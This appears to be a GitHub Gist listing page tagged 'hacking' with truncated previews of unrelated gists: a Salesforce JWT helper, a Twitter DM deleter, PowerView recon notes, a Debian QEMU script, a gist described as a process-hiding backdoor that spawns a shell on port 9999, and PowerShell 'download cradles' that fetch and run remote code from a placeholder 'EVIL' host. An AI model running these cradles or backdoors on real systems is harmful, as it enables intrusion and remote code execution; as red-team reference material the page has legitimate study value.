💣
hacking

Dan Staples dismantl
@lrvick
lrvick / github-troll.md
Last active May 3, 2024 16:20
Trolling Github's DMCA repo with their own security flaws.
@davidmreed
davidmreed / simple-salesforce-jwt.py
Created January 15, 2019 01:32
Using simple_salesforce with JWT authentication
import jwt
import requests
import datetime
from simple_salesforce import Salesforce
from simple_salesforce.exceptions import SalesforceAuthenticationFailed
def jwt_login(consumer_id, username, private_key, sandbox=False):
    endpoint = 'https://test.salesforce.com' if sandbox is True else 'https://login.salesforce.com'
    jwt_payload = jwt.encode(
        {
@taviso
taviso / delete-twitter-dm.js
Created November 3, 2017 16:33
Automate deleting twitter direct messages.
// Open direct messages window, paste this into console.
function deleteNextConversation()
{
    if (!(dm = document.getElementsByClassName("DMInbox-conversationItem")[0])) {
        clearInterval(tmr)
        return;
    }
    dm.firstChild.click();
    setTimeout('document.getElementsByClassName("js-actionDeleteConversation")[0].click()', 1000);
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active May 8, 2024 12:58
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@epinna
epinna / pypest.py
Last active September 4, 2023 02:13
Hackish one-liner memory-only backdoor agent which hides from ps
#!/usr/bin/env python
# This script prints a simple one-liner memory-only backdoor agent which hides from ps.
# It renames itself within the process list using a really hackish (AND POTENTIALLY DANGEROUS) /proc/self/mem rewrite
# and spawns a shell on port 9999. Just an experiment, there are simpler ways to run unnoticed in the
# process list (see the technique used by EmPyre: https://github.com/adaptivethreat/EmPyre)
template = """
import sys,re,pty,os,socket
@jalsot
jalsot / qemu-debian-create-image
Last active October 27, 2020 03:24 — forked from spectra/qemu-debian-create-image
Debian qemu image creation using debootstrap (automated from http://diogogomes.com/2012/07/13/debootstrap-kvm-image/ by Kamil Trzcinski (http://ayufan.eu) with some modifications by me)
#!/bin/bash
# Configs overwritable via environment variables
VSYSTEM=${VSYSTEM:=qemu} # Either 'qemu' or 'kvm'
FLAVOUR=${FLAVOUR:=debian} # Either 'debian' or 'ubuntu'
INCLUDES=${INCLUDES:="less,vim,sudo,openssh-server,acpid"}
MIRROR=${MIRROR:="http://ftp.hu.debian.org/debian"}
#MIRROR=${MIRROR:="http://localhost:3142/debian"}
#MIRROR=${MIRROR:="http://hu.archive.ubuntu.com/ubuntu/"}
#MIRROR=${MIRROR:="http://localhost:3142/ubuntu"}
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active May 13, 2024 15:40
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object